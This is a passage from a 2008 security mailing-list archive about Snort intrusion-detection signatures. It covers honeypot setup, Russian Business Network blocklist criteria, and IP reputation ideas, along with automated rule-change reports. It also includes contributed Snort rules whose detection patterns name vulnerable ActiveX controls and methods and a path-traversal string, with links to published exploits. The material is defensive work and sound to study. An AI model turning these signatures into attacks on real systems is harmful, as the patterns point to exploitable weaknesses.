self-explanatory I've found. Install and look at nepenthes.conf. It'll mostly run out of the box (if you get all the right libs to compile) If you have trouble post it here, very relevant to this list, and there are a lot of users of nep here. matt > Matt Jonkman wrote: >> Thats absolutely where we're going with SIDReporter Jason. More data >> sources, and some intelligent correlation. But we're learning as we go. >> >> The example Frank cited where we tried a shared snortsam feed: Worked >> GREAT! until we got to a large number of blocks. Then we had reliability >> and scale issues. I hope we can solve those issues here. >> >> But we need the data! :) >> >> Matt >> > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jlewis at packetnexus.com Thu Oct 2 12:01:16 2008 From: jlewis at packetnexus.com (Jason Lewis) Date: Thu, 02 Oct 2008 12:01:16 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4ECB8.9040501@jonkmans.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com> <48E4ECB8.9040501@jonkmans.com> Message-ID: <48E4F04C.9020606@packetnexus.com> I have it running and it's working fine. I guess I was looking for more in depth stuff like building modules and what other configurations people have...like using snort in front of the nepenthes box. Are there any nepenthes modules people have built that are worth looking at and aren't included with the source? The nepenthes mailing list seems low traffic, so it doesn't look like much help. > For the most part it's pretty self-explanatory I've found. Install and > look at nepenthes.conf. It'll mostly run out of the box (if you get all > the right libs to compile) > > If you have trouble post it here, very relevant to this list, and there > are a lot of users of nep here. > > matt > > From pepperjack at afferentsecurity.com Thu Oct 2 12:16:27 2008 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Thu, 02 Oct 2008 11:16:27 -0500 Subject: [Emerging-Sigs] RBN rules Message-ID: <20081002111627.tnx37gytc4cgcws4@mail.afferentsecurity.com> How does the end of atrivo affect the RBN rulesets? What is the criteria for hosts to be on the "Known Russian Business Network Monitored Domains" rules (sids 2406000++) ? Do the various RBN sids represent different basis for making the list? thanks. jp -- Framework? I don't need no stinking framework! ---------------------------------------------------------------- @fferent Security Labs: Isolate/Insulate/Innovate http://www.afferentsecurity.com From emerging at emergingthreats.net Thu Oct 2 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 2 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081002200008.878134502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Oct 2 16:00:08 2008 [***] [+++] Added rules: [+++] 2008612 - ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method (emerging-exploit.rules) 2008613 - ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method (emerging-exploit.rules) 2008614 - ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection (emerging-web_sql_injection.rules) 2008615 - ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection (emerging-web_sql_injection.rules) 2008616 - ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection (emerging-web_sql_injection.rules) 2008617 - ET SCAN Wikto Scan (emerging-scan.rules) [///] Modified active rules: [///] 2008508 - ET CURRENT_EVENTS Internal User may have Visited an ASPROX Infected Site (emerging.rules) 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Added to emerging-rbn.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Added to emerging-sid-msg.map (6): 2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html 2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/ 2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/ 2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/ 2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm -> Added to emerging-sid-msg.map.txt (6): 2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html 2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/ 2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/ 2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/ 2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm -> Added to emerging-web_sql_injection.rules (3): #by Stillsecure #by Stillsecure #by Stillsecure [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 74 # Updated 2008-09-29 22:09:20 -> Removed from emerging-rbn.rules (2): # VERSION 74 # Updated 2008-09-29 22:09:20 -> Removed from emerging-sid-msg.map (2): 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Removed from emerging-sid-msg.map.txt (2): 2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork From frank at knobbe.us Thu Oct 2 18:24:16 2008 From: frank at knobbe.us (Frank Knobbe) Date: Thu, 02 Oct 2008 17:24:16 -0500 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4E2F6.9020005@packetnexus.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> Message-ID: <1222986256.3572.18.camel@localhost> On Thu, 2008-10-02 at 11:04 -0400, Jason Lewis wrote: > Frank this sounds to me like an IP reputation system. I've given some > thought to a system that tracked IP reputation, which would in turn lead > to a CIDR reputation list as well as Autonomous System rep list. The > idea is that a CIDR with lots of bad IPs would also bad by association. > It seems that a few spam blacklists work in a similar way. > > The idea of data merging isn't new and that sounds like what you're > proposing. If an IP is on a botnet list and a spam list and a IDS alert > list, etc... you would start to think blocking that IP is a good idea. Well, my point there was that known botnet C&C's carry by itself a higher value or reputation as a scan. Even scans can be further classified by their type if the scanning behavior is known. Some NetBIOS/RPC/Popup scans seem to troll local ranges (for example a /24), while ISC's DNS-scan covers the whole Internet. Some SSH scans have also been observed across a wide range of IP's while others SSH scans again seem to be localized. Reputation by how many folks have seen the IP is good for scans, but I think to provide a good list, we need to mix that with weights based on scan/access types and/or SID of the triggering Snort rule. On Thu, 2008-10-02 at 10:50 -0400, Matt Jonkman wrote: > Funny you should mention that. This is exactly what SIDReporter intends > to be. By using attackers linked tot he signature they tripped and then > correlating that amongst many sites for reliability, I believe we can > make a VERY good list of things to block and feed that abck to our users. Gotcha. I thought it was more aimed at measuring signature performance to improve our rules. > The data is starting to flow with SIDReporter, thanks to the folks > using it so far. We're learning how to manipulate this data and will be > feeding abck some trends and top attackers very soon. More input is > required though, so please consider setting up and feeding back, it's > all anonymous!! Well, if you like, I can add all my IDS alerts for the last 5+ years :) Catch me in IRC to discuss. Cheers, Frank -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081002/894256d7/attachment.bin From jonkman at jonkmans.com Thu Oct 2 19:06:25 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 02 Oct 2008 19:06:25 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <1222986256.3572.18.camel@localhost> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <1222986256.3572.18.camel@localhost> Message-ID: <48E553F1.7030504@jonkmans.com> Frank Knobbe wrote: > Well, my point there was that known botnet C&C's carry by itself a > higher value or reputation as a scan. Even scans can be further > classified by their type if the scanning behavior is known. Some > NetBIOS/RPC/Popup scans seem to troll local ranges (for example a /24), > while ISC's DNS-scan covers the whole Internet. Some SSH scans have also > been observed across a wide range of IP's while others SSH scans again > seem to be localized. Agreed. I hope we can categorize by violation type, which we can deduce by snort sigs hitting. > Gotcha. I thought it was more aimed at measuring signature performance to improve our rules. Thats the initial goal, but the longer term is to make as much value from this data for all as possible. Matt > > Cheers, > Frank > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From signatures at stillsecure.com Fri Oct 3 10:02:33 2008 From: signatures at stillsecure.com (signatures) Date: Fri, 3 Oct 2008 08:02:33 -0600 Subject: [Emerging-Sigs] StillSecure: Signatures - 3rd Oct-08 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com> Hi Matt Please find 5 New Signatures below: 1. IAS Helper COM Component iashlpr.dll activex remote DOS alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"IAS Helper COM Component iashlpr.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D"; distance:0; nocase; content:"PutProperty"; nocase; classtype:web-application-attack; reference:url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded; reference:cve,2008-2639; reference:url,securityreason.com/securityalert/4323; sid:8413; rev:1;) 2. Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"; distance:0; nocase; content:"CanUninstall"; nocase; classtype:web-application-attack; reference:bugtraq,31435; reference:url,securitytracker.com/alerts/2008/Sep/1020951.html; sid:8414; rev:1;) 3. Internet Information Service iisext.dll activex setpassword Insecure Method alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service iisext.dll activex setpassword Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"C3B32488-AFEC-11D1-9868-00A0C922E703"; distance:0; nocase; content:"SetPassword"; nocase; classtype:web-application-attack; reference:cve,2008-4301; reference:url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded; sid:8415; rev:1;) 4. Internet Information Service adsiis.dll activex remote DOS alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service adsiis.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"D6BFA35E-89F2-11D0-8527-00C04FD8D503"; distance:0; nocase; content:"GetObject"; nocase; classtype:web-application-attack; reference:cve,2008-4300; reference:url,securityreason.com/securityalert/4325; sid:8416; rev:1;) 5. Pritlog index.php filename File Disclosure alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Pritlog index.php filename File Disclosure"; flow:established,to_server; content:"GET"; uricontent:"/index.php?option=viewEntry"; nocase; uricontent:"&filename="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,secunia.com/Advisories/31969/; reference:url,www.milw0rm.com/exploits/6613; sid:8417; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081003/0aa00014/attachment-0001.html From jlewis at packetnexus.com Fri Oct 3 11:22:37 2008 From: jlewis at packetnexus.com (Jason Lewis) Date: Fri, 03 Oct 2008 11:22:37 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4F04C.9020606@packetnexus.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com> <48E4ECB8.9040501@jonkmans.com> <48E4F04C.9020606@packetnexus.com> Message-ID: <48E638BD.1030303@packetnexus.com> Bad form replying to myself...but anyway. My real honeypot network isn't up yet, so I've been testing on my comcast IP. I've noticed that it looks like comcast filters the common MS ports (135,137,139,445) and that I have zero binaries collected. I'm seeing a few scans and attempts to exploit Vertias, but no binaries. My question is...Are the MS ports the primary ports when binaries are involved? If this info exists somewhere on the net, I'd love to see it. jas Jason Lewis wrote: > I have it running and it's working fine. I guess I was looking for more > in depth stuff like building modules and what other configurations > people have...like using snort in front of the nepenthes box. Are there > any nepenthes modules people have built that are worth looking at and > aren't included with the source? The nepenthes mailing list seems low > traffic, so it doesn't look like much help. > >> For the most part it's pretty self-explanatory I've found. Install and >> look at nepenthes.conf. It'll mostly run out of the box (if you get all >> the right libs to compile) >> >> If you have trouble post it here, very relevant to this list, and there >> are a lot of users of nep here. >> >> matt >> >> >> > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > From jim.mcquaid at gmail.com Fri Oct 3 12:37:38 2008 From: jim.mcquaid at gmail.com (James McQuaid) Date: Fri, 3 Oct 2008 12:37:38 -0400 Subject: [Emerging-Sigs] RBN rules Message-ID: Atrivo was up and down for a few days, so we're just making certain that they don't come back. When Atrivo's IP space is reallocated, we will look at it closely, and remove IP ranges where appropriate. RBN IP addresses include domains registered by known members of criminal organization, their franchises, affiliates and customers. A considerable amount of research is involved, and as this has accumulated, it has contributed to our ability to identify them. Presently, the SIDS do not reflect differentiation. Thank you, James > 2. RBN rules (Jack Pepper) > Message: 2 > Date: Thu, 02 Oct 2008 11:16:27 -0500 > From: Jack Pepper > Subject: [Emerging-Sigs] RBN rules > To: emerging-sigs at emergingthreats.net > Message-ID: > <20081002111627.tnx37gytc4cgcws4 at mail.afferentsecurity.com> > Content-Type: text/plain; charset=ISO-8859-1; DelSp="Yes"; > format="flowed" > > How does the end of atrivo affect the RBN rulesets? > > What is the criteria for hosts to be on the "Known Russian Business > Network Monitored Domains" rules (sids 2406000++) ? > > Do the various RBN sids represent different basis for making the list? > > thanks. > > jp -- James McQuaid http://www.jamesmcquaid.com From emerging at emergingthreats.net Fri Oct 3 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 3 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081003200008.CF25C45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Oct 3 16:00:08 2008 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 4 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 4 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081004200008.24AE145026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 4 16:00:08 2008 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 4 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 4 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081004220008.553DA45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 4 18:00:08 2008 [***] [+++] Added rules: [+++] 2008593 - ET TROJAN Ultimate Defender Fake AV Checkin (emerging-virus.rules) 2008594 - ET MALWARE ezday.co.kr Related Spyware User-Agent Detected (Ezshop) (emerging-malware.rules) 2008595 - ET P2P SoulSeek P2P Server Connection (emerging-p2p.rules) 2008596 - ET SCAN Brute Force Exploit Detector HTTP Buffer Overflow Detection (emerging-scan.rules) 2008597 - ET SCAN Cisco Torch SNMP Scan (emerging-scan.rules) 2008598 - ET SCAN Sipsak SIP scan (emerging-scan.rules) 2008599 - ET CURRENT_EVENTS Asprox Cookie SQL Injection Attempt (emerging.rules) 2008600 - ET MALWARE Suspicious User-Agent Detected (Windows+NT) (emerging-malware.rules) 2008601 - ET TROJAN Visual Shock Keylogger Reporting to Controller (emerging-virus.rules) 2008602 - ET TROJAN Visual Shock Keylogger Reporting Idle to Controller (emerging-virus.rules) 2008603 - ET MALWARE Suspicious User-Agent Detected (RLMultySocket) (emerging-malware.rules) 2008604 - ET TROJAN Gamethief/PSW.Magania Checkin (emerging-virus.rules) 2008605 - ET SCAN Stompy Web Application Session Scan (emerging-scan.rules) 2008606 - ET SCAN Enumiax Inter-Asterisk Exchange Protocol Username Scan (emerging-scan.rules) 2008607 - ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS (emerging-exploit.rules) 2008608 - ET MALWARE WinFixer Trojan Related User-Agent Detected (ElectroSun NetInstaller) (emerging-malware.rules) 2008609 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan (emerging-scan.rules) 2008610 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Components Scan (emerging-scan.rules) 2008611 - ET P2P SoulSeek P2P Login Response (emerging-p2p.rules) 2008612 - ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method (emerging-exploit.rules) 2008613 - ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method (emerging-exploit.rules) 2008614 - ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection (emerging-web_sql_injection.rules) 2008615 - ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection (emerging-web_sql_injection.rules) 2008616 - ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection (emerging-web_sql_injection.rules) 2008617 - ET SCAN Wikto Scan (emerging-scan.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) 